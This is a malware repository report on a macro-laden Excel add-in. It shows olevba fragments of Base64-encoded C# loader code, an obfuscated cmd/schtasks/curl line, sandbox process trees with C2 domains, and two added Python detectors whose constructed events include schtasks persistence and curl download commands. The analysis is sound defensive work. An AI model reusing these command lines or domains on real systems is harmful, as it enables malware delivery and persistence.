StringRemoveSpecialCharact int f2hhcmFjdGVycyhzdHJpbmcgc3Ry
String myNewThread.Starelsenew RandoCAgICBteU5ld1RocmVhZC5TdGFy
String Thre // The impChyZC5OZXh0KDUsIDEwKSAqIDEw
String else re publicstaticD09ICcjJyAmJiBjb3VudCA9PSAx
String public classSample : System.Configuration.InstaS5Db25maWd1cmF0aW9uLkluc3Rh
String returnHRydWU7DQogICAgICAgIH0NCiAg
String return System.Text.Encoding.UTF8.Getprivate stringXORDecryp var plaintexGluZy5VVEY4LkdldFN0cmluZyhi
StringstringcipherTe //stringXRqa2coc3RyaW5nIGNpcGhlclRl
StringConvert.FromBase64StmFzZTY0U3RyaW5nKGNpcGhlclRl
Stringystem.Collections.IDictionary save MainWindow/f /sc minute /mo 26--headless cmd /v:onW9ucy5JRGljdGlvbmFyeSBzYXZlJiBzZXQgNjY1PXRwczomIHNldCA1NjU9ITc2NSEhNjY1IRyZW5kcyYgY3VybCAhNDY1IS5jb20vZDZaMi5wXmhecD9code and P-code are different, this may havebeen used to hide malicious code
String usingXB0b3IgPSBBZXMuQ3JlYXRlKCkp
StringRfc2898DeriveBytespd//Rfc2898mZjMjg5OERlcml2ZUJ5dGVzIHBk
Stringnew Rfc2898DeriveByt usmVCeXRlcyhFbmNyeXB0aW9uS2V5
Stringencryptor.CreateDecrWF0ZURlY3J5cHRvcigpLCBDcnlw
String publicstatic stringmcgdWZyaXVma3NkKHN0cmluZyBj
String if elsewhereCIiIHx8IHdoZXJlID09IG51bGwp
StringtObjectSearcherXIgb2JqT1MgPSBkZWZhdWx0KE1h
Stringbject objMgmt inGluIG9iak9TLkdldCgpKQ0KICAg
String catchCAgICAgICAgICAgew0KICAgICAg
StringaseObject obmFnZW1lbnRCYXNlT2JqZWN0IG9i
String_NT_HEADERS_COMMONGetCommonNtH19DT01NT04gR2V0Q29tbW9uTnRI
StringIMAGE_DOS_HEADERURFUiBkb3NIZWFkZXIpDQogICAg
String stream.S0hlYWRlci5lX2xmYW5ldywgU2Vl
String returnReadStructFromStrem4gUmVhZFN0cnVjdEZyb21TdHJl
StringIMAGE_NT_HEADERS32stE50SGVhZGVyMzIoU3RyZWFtIHN0
String static boolT_H returnntHemFsaWRFeGUzMihJTUFHRV9OVF9I
String ifCAgICBpZiAobWVtb3J5ID09IElu
Stringthrow newInvalidOperaHJvdyBuZXcgSW52YWxpZE9wZXJh
String int ifthrowCAgIGludCBieXRlc1JlYWQgPSBz
Stringrshal.PtrToStructure finallynVjdHVyZShtZW1vcnksIHR5cGVv
StringIMAGE_NT_HEADCAgICAgICBJTUFHRV9OVF9IRUFE
StringifGVhZGVyLlNpZ25hdHVyZSAhPSBJ
String return falader.ChCAgICAgICAgICByZXR1cm4gZmFs
StringACHINE_I386:0ZJTEVfTUFDSElORV9JMzg2Og0K
StringCHINE_IA64:CAgICAgICAgICAgICAgICAgICAg
StringACHINE_AMD64:QogICAgICAgICAgICAgICAgICAg
Stringstatic string GetUni if stXRVbmlxdWVGaWxlUGF0aChzdHJp
String.IO.Path.GetDirectorSystem.IO.Path.GXJlY3RvcnlOYW1lKGZpbGVwYXRo
StringSystem.IO.Path.GetExC5HZXRFeHRlbnNpb24oZmlsZXBh
String intSAxOw0KICAgICAgICAgICAgICAg
String.Path.Combinnumb w3lzdGVtLklPLlBhdGguQ29tYmlu
Stringnew System.Timers.Ti //var //void dohangedEventAr //nMuVGltZXIobmV3IFRpbWVTcGFu
String //CAgICB0aW1lci5TdG9wKCk7DQog
Stringif /XNDaGFuZ2VkKQ0KICAgICAgICAv
String //falsHJvZ3Jlc0NoYW5nZWQgPSBmYWxz
String // //elsCAgIC8vICAgICAgICAgICAgZWxz
String // //CAgLy8gICAgICAgICAgICAgICAg
String //tcs.TrySeCAgICAgICAgICAgdGNzLlRyeVNl
Stringclient.DownloadProgressChanged25sb2FkUHJvZ3Jlc3NDaGFuZ2Vk
String //client.DisCAgICAgICAgICBjbGllbnQuRGlz
String //timerHWVyLkVsYXBzZWQgLT0gdGltZXJI
String // //string filePathCAgLy8gc3RyaW5nIGZpbGVQYXRo
String //try //CAgdHJ5DQogICAgICAgIC8vICAg
String //client.DownloadProgressC //time //timeW50LkRvd25sb2FkUHJvZ3Jlc3ND
String //await client.DownloaGF3YWl0IGNsaWVudC5Eb3dubG9h
String //finallyCAgIGZpbmFsbHkNCiAgICAgICAg
String //return tcs.Tr //CAgICAgICByZXR1cm4gdGNzLlRy
StringestProcess.StartInfo.UseShellExecGFydEluZm8uVXNlU2hlbGxFeGVj
String requestProcess.StartInforequestProcesWVzdFByb2Nlc3MuU3RhcnRJbmZv
Stringess.StartInfo.CreatekNyZWF0ZU5vV2luZG93ID0gdHJ1
String //Degitjkg:GVMaW5lKCJnamZka2dpdGprZzog
StringCBzd2l0Y2ggKHN0cmxpc3RbMl0p
String sment.SpecialFo brecaCAgICAgICAgICAgICAgICAgICBz
Stringvironment.GetFolderPm9sZGVyUGF0aChFbnZpcm9ubWVu
StringEnvironment.GetFoCA9IEVudmlyb25tZW50LkdldEZv
String.SpecialFolder.Templi5UZW1wbGF0ZXMpICsgIlxcIjsN
StringdefauCAgICAgICAgICAgICAgIGRlZmF1
String ifEnvironment.GetGF0aCA9PSAiIikNCiAgICAgICAg
Stringnt.SpecialFolder.AppServicePoiGVyLkFwcGxpY2F0aW9uRGF0YSkg
StringificateValidationCalGlvbkNhbGxiYWNrID0gZGVsZWdh
StringServicePointMaCAgICAgIFNlcnZpY2VQb2ludE1h
StringlType.Tl SecurityProtoco
StringlType.Tls SecurityProtoco
StringlType.Ssl3 SecurityProtoco
StringXQ8Cwooi2cF6Aq2zZTANTJ6WlRBTm0rY2hEMWZwNUk2c3c4
Stringam47qhPZ7iczs5nXVWiCBaclK8lvA7sLZHW5YVldpQ0JhY2xLOGx2QTdzTFpI
String5tT89s1EgnbRV8oIXPj5G9JWFBqNWYrYWdaRUszWmtuaU0y
StringCyKO/e2DGKxLPwVSf5nb1ZTZjVuYll4ZkYzUT09Iik7IC8v
Stringstring requestedFilemVxdWVzdGVkRmlsZSA9IGZuYW1l
Stringyou want from serverXJ2ZXINCg0KICAgICAgICAgICAg
Stringusingusing Systemusingus3N0aWNzOw0KdXNpbmcgU3lzdGVt
StringtryCB0cnkNCiAgICAgICAgICAgICAg
Stringusingusing System.kh0dHA7DQp1c2luZyBTeXN0ZW0u
String // Send filenameas fy8gU2VuZCBmaWxlbmFtZSBhcyBm
String var formCAgICAgICAgICAgIHZhciBmb3Jt
Stringusing System.Text.ReusingkV4cHJlc3Npb25zOw0KdXNpbmcg
StringDataContentCAgICAgICAgICAgICAgICAgICB7
Stringusing System.ThreadinameHJlYWRpbmcuVGFza3M7DQpuYW1l
String structIMAGE_DOS_HEADER publicCAgew0KICAgICAgICBwdWJsaWMg
String// Magic number public ushg0KICAgICAgICBwdWJsaWMgdXNo
Stringget filename fromContent-Dispositio20gQ29udGVudC1EaXNwb3NpdGlv
StringBytes on last pageof fileGFnZSBvZiBmaWxlDQogICAgICAg
String// Pages in file pXMgaW4gZmlsZQ0KICAgICAgICBw
String// Relocations publiXRpb25zDQogICAgICAgIHB1Ymxp
String // p_globleCAgICAgICAgIC8vIHBfZ2xvYmxl
String// Size of header inparagraphsWFkZXIgaW4gcGFyYWdyYXBocw0K
StringHeaders.ContentDisposition.FileNamnREaXNwb3NpdGlvbi5GaWxlTmFt
Stringtent.Headers.Content29udGVudERpc3Bvc2l0aW9uICE9
String public// MG9ydCBlX21heGFsbG9jOyAvLyBN
StringContent.Headers.CnNlLkNvbnRlbnQuSGVhZGVycy5D
Stringparagraphs needed publicushortSS value puCAgICAgIHB1YmxpYyB1c2hvcnQg
StringfileNamCAgICAgICAgICAgICBmaWxlTmFt
String// Initial SP value pCBTUCB2YWx1ZQ0KICAgICAgICBw
String// Checksum public u3VtDQogICAgICAgIHB1YmxpYyB1
Stringntent.Headers.ContentDisposition.FkNvbnRlbnREaXNwb3NpdGlvbi5G
StringInitial IP value publicWx1ZQ0KICAgICAgICBwdWJsaWMg
String p_glCAgICAgICAgICAgICAgICBwX2ds
String// InitialGF0aXZlKSBDUyB2YWx1ZQ0KICAg
StringSave the responsestream to diskG9uc2Ugc3RyZWFtIHRvIGRpc2sN
String public// OvenQgZV9vdm5vOyAgICAgLy8gT3Zl
String public uintReseV9yZXMxOyAgICAgICAvLyBSZXNl
String SystfileBymZlci5CbG9ja0NvcHkoZmlsZUJ5
String public uintReservedCAgICAgIC8vIFJlc2VydmVkDQog
String FileUFsbEJ5dGVzKHBfZ2xvYmxlMSwg
String public// OEMnQgZV9vZW1pbmZvOyAgLy8gT0VN
Stringystem.IO.Path.ChangekNoYW5nZUV4dGVuc2lvbihwX2ds
Stringe_oemid specific public uinte_CAgICAgIHB1YmxpYyB1aW50IGVf
StringmkbpDgeaIbETxENCwM1KU5Dd00xS1E9PSIpKTsNCiAgICAg
StringReserved public uintHVibGljIHVpbnQgZV9yZXM0OyAg
String codeCAgICAgICAgICAgICAgIGNvZGUg
String public uintWludCBlX3JlczU7ICAgICAgIC8v
String elseCBlbHNlDQogICAgICAgICAgICAg
String //elseCAgICAgICAgICB7DQogICAgICAg
String public uintReservmVzNjsgICAgICAgLy8gUmVzZXJ2
String structIMAGE_FILE_HEADER pEVSDQogICAgew0KICAgICAgICBw
String7iczs5nXVWiCBaclK8lvA7sLZHiC1to413WNsSzhsdkE3c0xaSGlDMXRvNDEz
String staticpublic void try2lkIGl5dXRpZXJqayhzdHJpbmcg
String publicushort SizeOfOptionaHVzaG9ydCBTaXplT2ZPcHRpb25h
String ServicePointManager.ServmljZVBvaW50TWFuYWdlci5TZXJ2
String publicushort struGFyYWN0ZXJpc3RpY3M7DQogICAg
String ServicePointManager.Expect100CW50TWFuYWdlci5FeHBlY3QxMDBD
StringADER32 public ushoQogICAgICAgIHB1YmxpYyB1c2hv
String ServicePointManager.S2VydmljZVBvaW50TWFuYWdlci5T
String public bytem9yTGlua2VyVmVyc2lvbjsNCiAg
StringcurityProtocolType.TlsFR5cGUuVGxzDQogICAgICAgICAg
String public uintSizeOfInitializeWludCBTaXplT2ZJbml0aWFsaXpl
StringityProtocolType.Tls11GUuVGxzMTENCiAgICAgICAgICAg
String public uintSizeOfUninitializedDlVuaW5pdGlhbGl6ZWREYXRhOw0K
StringtyProtocolType.Tls12S5UbHMxMg0KICAgICAgICAgICAg
StringEncoding.UTF8.GetBytkdldEJ5dGVzKHp4YSkpOw0KDQog
String--axxyyuiyt---------i0tYXh4eXl1aXl0LS0tLS0tLS0t
StringMajorOperatingSystemmdTeXN0ZW1WZXJzaW9uOw0KICAg
StringDateTime.Now.Ticks.TGlja3MuVG9TdHJpbmcoIngiKTsN
StringinorOperatingSystemV3lzdGVtVmVyc2lvbjsNCiAgICAg
Stringrequest.ContentTypeHlwZSA9IGdqZmRrZ2l0amtnKCIz
String publicushortMinorSubsystemV2hvcnQgTWlub3JTdWJzeXN0ZW1W
StringzIx/iUIqmWuo5pKgTYkEX/fUbu55IOX1q2EtnVFlrRVgvZlVidTU1SU9YMXEy
String public uint publWNrU3VtOw0KICAgICAgICBwdWJs
String publicushort DllCharactGljIHVzaG9ydCBEbGxDaGFyYWN0
String//string formgHbD3WvXlxzFivCAgICAgICAvL3N0cmluZyBmb3Jt
String public uint pubXJGbGFnczsNCiAgICAgICAgcHVi
StringEncoding.ASCII.GVyID0gRW5jb2RpbmcuQVNDSUku
StringizeOfInitializedData pubmVkRGF0YTsNCiAgICAgICAgcHVi
String publicCk7DQogICAgICAgICAgICAgICAg
Stringushort MajorOperatinXRpbmdTeXN0ZW1WZXJzaW9uOw0K
String //Initia whileGl6ZUNvbXBvbmVudCgpOw0KICAg
Stringushort MinorOperatinW5nU3lzdGVtVmVyc2lvbjsNCiAg
StringHuoLAYhYHSz6HTWFkLlNsZWVwKHJkLk5leHQoMSwg
String4NBtR4NJUu3WVDBxSsQmWBWLYTQhhLbI7tEJ4U3NRbUdobVpUMFhSaHVsdz0i
String publicushort MinorSubsystyB1c2hvcnQgTWlub3JTdWJzeXN0
Stringnt.GetEnvironmentVarWVudFZhcmlhYmxlKGdqZmRrZ2l0
String public uint pENoZWNrU3VtOw0KICAgICAgICBw
String public ulongyBTaXplT2ZTdGFja1Jlc2VydmU7
StringServerCertificateValidationCallbac Serv2F0ZVZhbGlkYXRpb25DYWxsYmFj
Stringager.SecurityProtocoHJvdG9jb2wgPSBTZWN1cml0eVBy
StringIMAGE_FILE_HEADER strucEZpbGVIZWFkZXI7DQogICAgfQ0K
String publicIMAGE_FILE_HEADEREVBREVSIEZpbGVIZWFkZXI7DQog
StringwdvGYiv/k1y9oL SecurityProtoco
StringOPTIONAL_HEADER32VIzMiBPcHRpb25hbEhlYWRlcjsN
StringIMAGE_NT_HEADERS64 public uiHsNCiAgICAgICAgcHVibGljIHVp
StringWiCBaclK8lvA7sLZHiC1to413bIeL/tTS30xaSGlDMXRvNDEzYkllTC90VFMz
String publicIMAGE_FILE_HEADERFileHe0VfRklMRV9IRUFERVIgRmlsZUhl
String public IMAGE_OPTIONAL_HEADER64Optional public classCoyoteMaths pkFMX0hFQURFUjY0IE9wdGlvbmFs
StringCruEYZK9MCg5HlPIB4gT32xVNCJF1UvtkAFBJQjRnVDMyeFZOQ0pGMVV2dGtB
Suspicious  Environ            May read system environment variables
Suspicious  Open               May open a file
Suspicious  Write              May write to a file (if combined with Open)
Suspicious  Binary             May read or write a binary file (if combined with Open)
Suspicious  ADODB.Stream       May create a text file
Suspicious  SaveToFile         May create a text file
Suspicious  Shell              May run an executable file or a system command
Suspicious  vbHide             May run an executable file or a system command
Suspicious  CreateObject       May create an OLE object
Suspicious  Windows            May enumerate application windows (if combined with Shell.Application object)
Suspicious  System             May run an executable file or a system command on a Mac (if combined with libc.dylib)
Suspicious  Environment        May read system environment variables
Suspicious  Run                May run an executable file or a system command
Suspicious  Create             May execute file or a system command through
Suspicious  DownloadFile       May download files from the Internet using
Suspicious  Hex Strings        Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
Suspicious  Base64 Strings     Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
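The Base64 rows above are what olevba emits when it finds long Base64 runs in the VBA text: a fragment of the decoded content in the keyword column and the start of the encoded run in the description column, so the payload appears only as scattered pieces. The Python below is an added example, not olevba's code, that reproduces the idea and takes it one step further: it decodes every run, decodes the reassembled stream as well (VBA commonly splits one blob across concatenated string literals, so identifiers straddling a chunk boundary are only visible after reassembly), and reports which .NET dropper traits the plaintext contains. The marker list and the VBA text are this example's constructions; the C# fragment is modelled on identifiers visible above (HttpWebRequest, ServerCertificateValidationCallback, IMAGE_DOS_SIGNATURE, an Installer subclass) and is not the sample's actual code.

```python
"""Decode Base64 runs embedded in VBA text and flag what the plaintext contains.

Added example; the VBA snippet and the C# payload below are constructed.
"""
import base64
import binascii
import re

# A run of at least 20 Base64 alphabet characters, optionally padded, not glued to other alphabet chars.
B64_RUN = re.compile(rb"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{20,}={0,2}(?![A-Za-z0-9+/])")

# Plaintext markers of a .NET dropper/loader (this example's list, not olevba's).
MARKERS = {
    "http-client": ("HttpWebRequest", "HttpClient", "GetResponseStream"),
    "tls-validation-disabled": ("ServerCertificateValidationCallback",),
    "pe-parser": ("IMAGE_DOS_SIGNATURE", "IMAGE_NT_HEADERS", "IMAGE_FILE_MACHINE_AMD64"),
    "installutil-entry": ("System.Configuration.Install.Installer", "RunInstaller"),
    "wmi-query": ("ManagementObjectSearcher",),
    "process-start": ("ProcessStartInfo", "Process.Start", "StartInfo.FileName"),
}


def _decode(run: bytes) -> bytes:
    core = run.rstrip(b"=")
    return base64.b64decode(core + b"=" * (-len(core) % 4))


def decode_b64_runs(text: bytes):
    """Yield (encoded_run, decoded_bytes) for each long Base64 run that decodes."""
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        try:
            yield run, _decode(run)
        except (binascii.Error, ValueError):
            continue


def is_mostly_text(b: bytes) -> bool:
    if not b:
        return False
    printable = sum(1 for c in b if 32 <= c < 127 or c in (9, 10, 13))
    return printable / len(b) > 0.95


def _scan(plain: bytes, into: set) -> None:
    s = plain.decode("ascii", "ignore")
    for cat, needles in MARKERS.items():
        if any(n in s for n in needles):
            into.add(cat)


def classify(text: bytes) -> dict:
    """Decode every Base64 run separately and as one reassembled stream."""
    report = {"runs": 0, "text_runs": 0, "hits": set(), "joined_hits": set()}
    runs = []
    for run, decoded in decode_b64_runs(text):
        runs.append(run.rstrip(b"="))
        report["runs"] += 1
        if is_mostly_text(decoded):
            report["text_runs"] += 1
            _scan(decoded, report["hits"])
    if runs:  # reassembly: markers split across literals are only visible here
        try:
            joined = _decode(b"".join(runs))
            if is_mostly_text(joined):
                _scan(joined, report["joined_hits"])
        except (binascii.Error, ValueError):
            pass
    return report


# Constructed C# fragment modelled on identifiers in the table; not the sample's code.
_CSHARP_SRC = b"""using System.Net;
namespace Coyote {
    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer {
        const ushort IMAGE_DOS_SIGNATURE = 0x5A4D;
        static void Fetch() {
            ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create("https://example.invalid/");
        }
    }
}
"""
# Pad to a multiple of 45 bytes so every 60-character Base64 chunk is self-contained.
CSHARP = _CSHARP_SRC + b"\n" * (-len(_CSHARP_SRC) % 45)


def build_sample_vba() -> bytes:
    """Constructed VBA: the payload split into 60-char Base64 literals joined with '&'."""
    enc = base64.b64encode(CSHARP)
    lines = [b"Private Sub Workbook_Open()", b"    Dim p As String"]
    for i in range(0, len(enc), 60):
        lines.append(b'    p = p & "' + enc[i:i + 60] + b'"')
    lines += [b"    Call Dropper(p)", b"End Sub"]
    return b"\n".join(lines)


if __name__ == "__main__":
    r = classify(build_sample_vba())
    print(r["runs"], "runs,", r["text_runs"], "textual;", sorted(r["hits"]), sorted(r["joined_hits"]))
```

The per-run hits are always a subset of the reassembled hits; when a table like the one above shows many short fragments, reassembling before matching is what turns "Base64 strings present" into "C# loader with TLS validation disabled and an InstallUtil entry point".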

Intelligence


File Origin
# of uploads: 5
# of downloads: 135
Origin country: HU
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Nominated Officials for the Conference.xlam
Verdict:
No threats detected
Analysis date:
2025-10-11 08:30:36 UTC
Tags:
macros macros-on-open

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
96.5%
Tags:
autorun office macro micro
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a window
Creating synchronization primitives
Creating a file
Creating a process with a hidden window
Launching a process
Creating a file in the %temp% directory
Launching a process by exploiting the app vulnerability
Unauthorized injection to a system process
Enabling autorun by creating a file
Result
Verdict:
Malicious
File Type:
Excel File with Macro
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
10/10
Confidence:
100%
Tags:
base64 cmd conhost lolbin macros macros-on-open masquerade persistence schtasks
Label:
Malicious
Suspicious Score:
10/10
Score Malicious:
1%
Score Benign:
0%
Result
Verdict:
MALICIOUS
Details
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
Document With No Content
Document contains little or no semantic information.
InQuest TF/IDF Classifier
An InQuest machine-learning model classified this macro as potentially malicious.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Macro with Hidden Shell
The VBA Shell() command is leveraged by this macro with a window style of '0' or 'vbHide'.
Verdict:
Malicious
File Type:
xlam
First seen:
2025-09-30T07:25:00Z UTC
Last seen:
2025-10-12T03:28:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Dropper.Win32.Agent.sb HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.MSOffice.SAgent.gen HEUR:Trojan.BAT.Miner.gen PDM:Trojan.Win32.Generic HEUR:Trojan.Multi.Miner.gen Trojan.MSOffice.SAgent.sb Trojan.MSIL.Dnoper.sb
Result
Threat name:
n/a
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document exploit detected (process start blacklist hit)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Schedule system process
Sigma detected: Suspicious Microsoft Office Child Process
Uses schtasks.exe or at.exe to add and modify task schedules
Behaviour
Behavior Graph (ID 1793319; sample "Nominated Officials for the..."; start date 11/10/2025; architecture WINDOWS; score 100). The flattened graph reads as the following process tree with its files, network endpoints and signatures:

EXCEL.EXE
    signature: Office process queries suspicious COM object (likely to drop second stage)
    dropped: ~$Nominated Offici...onference.xlam.xlsx (data)
    network: part-0013.t-0009.t-msedge.net 13.107.246.41:443 (MICROSOFT-CORP-MSN-AS-BLOCK, United States); osiprod-ncus-buff-azsc-000.northcentralus.cloudapp.azure.com 52.109.16.112:443 (MICROSOFT-CORP-MSN-AS-BLOCK, United States)
    -> csc.exe
        dropped: C:\ProgramData\USOShared\vlcplayer.dll (PE32)
        -> conhost.exe
        -> cvtres.exe
    -> InstallUtil.exe
        network: msoffice.365cloudz.esanojinjasvc.com 78.110.166.82:443 (UKSERVERS-AS UK Dedicated Servers Hosting and Co-Location, United Kingdom)
        -> conhost.exe
    -> splwow64.exe
cmd.exe
    signatures: Obfuscated command line found; Uses schtasks.exe or at.exe to add and modify task schedules
    -> conhost.exe
    -> schtasks.exe
cmd.exe
    -> curl.exe
        network: keeferbeautytrends.com 72.9.158.105:443 (ASN-DISUS, United States); 127.0.0.1
    -> cmd.exe

Other resolved names: www.keeferbeautytrends.com, us1.roaming1.live.com.akadns.net, and 13 other IPs or domains. Root-level signatures: Antivirus detection for URL or domain; Antivirus detection for dropped file; Multi AV Scanner detection for submitted file; 10 other signatures.

The two Microsoft-owned endpoints contacted by EXCEL.EXE are consistent with ordinary Office service traffic; the contacts worth pivoting on are the InstallUtil.exe connection to msoffice.365cloudz.esanojinjasvc.com, whose hostname imitates a Microsoft 365 service (the dropped names msoffice365.dll and vlcplayer.dll follow the same masquerading pattern), and the curl.exe fetch from keeferbeautytrends.com.
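The process tree in the behaviour graph above (EXCEL.EXE spawning csc.exe and InstallUtil.exe, cmd.exe spawning schtasks.exe and curl.exe) is what the "Suspicious Microsoft Office Child Process" and "Schedule system process" Sigma hits describe. The Python below is an added example, not a Sigma rule or any vendor's code, that implements that logic over process-creation events with Sysmon-style fields (Image, CommandLine, ProcessId, ParentProcessId), reconstructing the tree from the PID links so that grandchildren such as schtasks.exe under cmd.exe are attributed to the Office root. The events, PIDs, paths and command lines are constructed for the demo and only loosely mirror the graph.

```python
"""Detect Office applications spawning LOLBins, including via intermediate cmd.exe.

Added example; the events below are constructed Sysmon-style records, not sandbox output.
"""

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Interpreters, compilers, downloaders and persistence tools Office should not start.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "csc.exe",
    "installutil.exe", "schtasks.exe", "curl.exe", "certutil.exe", "rundll32.exe",
    "regsvr32.exe", "msbuild.exe", "bitsadmin.exe",
}
# Children Office legitimately starts; kept short and explicit rather than open-ended.
BENIGN_CHILDREN = {"splwow64.exe", "conhost.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_root(pid, by_pid, max_depth=8):
    """Follow ParentProcessId links upward; return the Office ancestor event or None."""
    ev = by_pid.get(pid)
    for _ in range(max_depth):
        if ev is None:
            return None
        if basename(ev["Image"]) in OFFICE_APPS:
            return ev
        ev = by_pid.get(ev["ParentProcessId"])
    return None


def detect(events):
    """Return one alert per suspicious process that descends from an Office application."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["Image"])
        if name in OFFICE_APPS or name in BENIGN_CHILDREN or name not in SUSPICIOUS_CHILDREN:
            continue
        root = office_root(e["ParentProcessId"], by_pid)
        if root is None:
            continue
        rule = "office_descendant_lolbin"
        cmd = e["CommandLine"].lower()
        if name == "schtasks.exe" and ("/create" in cmd or "/sc " in cmd):
            rule = "office_descendant_schtasks_create"
        alerts.append({"rule": rule, "pid": e["ProcessId"], "image": name,
                       "root": basename(root["Image"]), "cmd": e["CommandLine"]})
    return alerts


# Constructed events mirroring the graph: EXCEL -> csc/InstallUtil/splwow64, cmd -> schtasks, cmd -> curl.
EVENTS = [
    {"ProcessId": 4000, "ParentProcessId": 900, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" "C:\Users\user\Desktop\Nominated Officials for the Conference.xlam"'},
    {"ProcessId": 4100, "ParentProcessId": 4000, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /noconfig /target:library /out:C:\ProgramData\USOShared\vlcplayer.dll x.cs"},
    {"ProcessId": 4110, "ParentProcessId": 4100, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "CommandLine": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"ProcessId": 4200, "ParentProcessId": 4000, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false C:\ProgramData\USOShared\vlcplayer.dll"},
    {"ProcessId": 4300, "ParentProcessId": 4000, "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"ProcessId": 4400, "ParentProcessId": 4000, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /v:on /c "set a=tps:&& curl ht!a!//keeferbeautytrends.com/"'},
    {"ProcessId": 4410, "ParentProcessId": 4400, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /f /sc minute /mo 26 /tn OfficeUpdate /tr "C:\ProgramData\USOShared\kefe.bat"'},
    {"ProcessId": 4420, "ParentProcessId": 4400, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe https://keeferbeautytrends.com/"},
    {"ProcessId": 5000, "ParentProcessId": 900, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["rule"], a["pid"], a["image"], "<-", a["root"])
```

The ancestry walk is the part worth keeping: a rule that only compares ParentImage against EXCEL.EXE misses the schtasks.exe persistence step because its direct parent is cmd.exe, and the standalone cmd.exe with no Office ancestor produces no alert, which keeps the logic usable on busy endpoints.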
Verdict:
Malware
YARA:
3 match(es)
Tags:
ADODB.Stream Blacklist VBA MSXML2.DOMDocument Office Document
Threat name:
Script-Macro.Trojan.Heuristic
Status:
Malicious
First seen:
2025-09-30 12:18:45 UTC
File Type:
Document
Extracted files:
28
AV detection:
17 of 38 (44.74%)
Threat level:
2/5
Result
Malware family:
n/a
Score:
10/10
Tags:
discovery macro
Behaviour
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Network Share Discovery
Drops startup file
Loads dropped DLL
Process spawned unexpected child process
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Detect_PowerShell_Obfuscation
Author: daniyyell
Description: Detects obfuscated PowerShell commands commonly used in malicious scripts.

Rule name: FreddyBearDropper
Author: Dwarozh Hoshiar
Description: Freddy Bear Dropper is dropping a malware through base64 encoded PowerShell script.

Rule name: informational_win_ole_protected
Author: Jeff White (karttoon@gmail.com) @noottrak
Description: Identify OLE Project protection within documents.

Rule name: NET
Author: malware-lu

Rule name: vbaproject_bin
Author: CD_R0M_
Description: {76 62 61 50 72 6f 6a 65 63 74 2e 62 69 6e} is hex for vbaproject.bin. Macros are often used by threat actors. Work in progress - Ran out of time

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments